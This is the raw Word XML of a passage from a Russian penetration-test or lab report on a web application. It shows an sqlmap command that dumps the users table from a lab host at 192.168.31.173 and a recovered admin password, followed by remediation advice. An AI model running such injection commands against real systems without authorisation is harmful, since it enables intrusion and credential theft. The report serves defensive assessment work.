        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Этап 3: эксплуатация уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B522493" w14:textId="2428EB95" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="00544153">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve">Автоматический перебор паролей к учётной записи </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> с использованием стандартного словаря </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00544153">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>://192.168.31.173/</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>=1" -</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3951DF70" w14:textId="77777777" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Результат:</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> подобран пароль P4ssw0rd для пользователя </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F5A2D5" w14:textId="77777777" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="00544153">
      <w:r w:rsidRPr="009506E0">
        <w:t>Авторизация в веб</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:noBreakHyphen/>
        <w:t>приложении с найденными учётными данными.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E74825F" w14:textId="77777777" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Результат:</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> получен полный доступ к функционалу приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6E195A" w14:textId="15F96863" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="00544153">
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Возможные последствия:</w:t>
      </w:r>
      <w:r w:rsidR="00544153">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>утечка конфиденциальных данных</w:t>
      </w:r>
      <w:r w:rsidR="00544153">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>несанкционированное изменение контента</w:t>
      </w:r>
      <w:r w:rsidR="00544153">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>захват сервера через загрузку веб</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:noBreakHyphen/>
        <w:t>шелла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12786FD4" w14:textId="352B5016" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="00544153" w:rsidP="00544153">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Р</w:t>
      </w:r>
      <w:r w:rsidR="009506E0" w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>иск</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">и - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009506E0" w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> высокая критичность</w:t>
      </w:r>
      <w:r w:rsidRPr="00544153">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009506E0" w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> позволяет полностью контролировать БД</w:t>
      </w:r>
      <w:r w:rsidRPr="00544153">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="009506E0" w:rsidRPr="009506E0">
        <w:t>лабый пароль</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3166C56C" w14:textId="6F4FD2F0" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FBFDAD" w14:textId="745B5E2D" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="00544153">
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Для SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>инъекций:</w:t>
      </w:r>
      <w:r w:rsidR="00544153">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>использовать параметризованные запросы</w:t>
      </w:r>
      <w:r w:rsidR="00544153">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve">внедрить </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidR="00544153">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>ограничить права учётной записи БД</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CC590C" w14:textId="58F7948A" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="00544153">
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Для паролей:</w:t>
      </w:r>
      <w:r w:rsidR="00544153">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>обязательная смена стандартных паролей</w:t>
      </w:r>
      <w:r w:rsidR="00544153">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>политика сложных паролей,</w:t>
      </w:r>
      <w:r w:rsidR="00544153">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>двухфакторная аутентификация</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE8E327" w14:textId="02149DF3" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="00544153">
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Общие меры:</w:t>
      </w:r>
      <w:r w:rsidR="00544153">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>регулярное обновление ПО</w:t>
      </w:r>
      <w:r w:rsidR="00544153">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>аудит логов веб</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:noBreakHyphen/>
        <w:t>сервера</w:t>
      </w:r>
      <w:r w:rsidR="00544153">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:t>тестирование на уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19832C4B" w14:textId="77777777" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Список использованных источников</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5846F0EB" w14:textId="1F23CF48" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:t>OWASP Top 10 (2023)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34953FA3" w14:textId="0EC46358" w:rsidR="009506E0" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve">Документация </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009506E0">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009506E0">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66B4D5BE" w14:textId="0B4C722A" w:rsidR="00D60685" w:rsidRPr="009506E0" w:rsidRDefault="009506E0" w:rsidP="009506E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009506E0">
        <w:t>ГОСТ Р 56545</w:t>
      </w:r>
      <w:r w:rsidRPr="009506E0">
        <w:noBreakHyphen/>
        <w:t>2015 «Защита информации. Уязвимости информационных систем»</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D60685" w:rsidRPr="009506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7832"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D1C8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33A25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6EC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077F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="183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3534B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A0A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03C0D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03AC2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22463"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="52DAE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5F2C98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0FFE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B01116"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E04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A2EAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E52E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D4EE3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="341A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1C1C8A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="207C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972DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="02A01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DF6193"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="067AB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243598"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="918C1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F168A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A3E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4E2342"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A2A1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614B43"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1892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6177E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC12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70432"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="52B2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864D26"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="001C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E161E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="16B6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3024E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="60E47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684486">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="332027353">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="434131387">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="388381745">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1183205351">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="285234445">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="207184079">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1148941356">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1255670950">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2123917195">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2100061550">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="796991224">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1391727910">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="931862407">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="720715974">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="2137410145">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1190333369">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="182059243">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="953749353">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="102115023">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1623881377">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="11544179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FF9"/>
    <w:rsid w:val="00396FBF"/>
    <w:rsid w:val="00544153"/>
    <w:rsid w:val="006657E7"/>
    <w:rsid w:val="00782FF9"/>
    <w:rsid w:val="008B1076"/>
    <w:rsid w:val="009506E0"/>
    <w:rsid w:val="00A80AC1"/>
    <w:rsid w:val="00B03840"/>
    <w:rsid w:val="00D523DB"/>
    <w:rsid w:val="00D60685"/>
    <w:rsid w:val="00E0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234D7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{511C71F8-0827-48E5-B47F-3DAFFA79B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1076"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00782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2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2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2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2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2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2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2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2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2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2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2FF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2FF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2F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2F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2F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2F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2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2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2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2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2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2F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2F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2FF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2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2FF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2FF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506E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506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Deamad</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Deamad</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-12T08:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-12T08:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>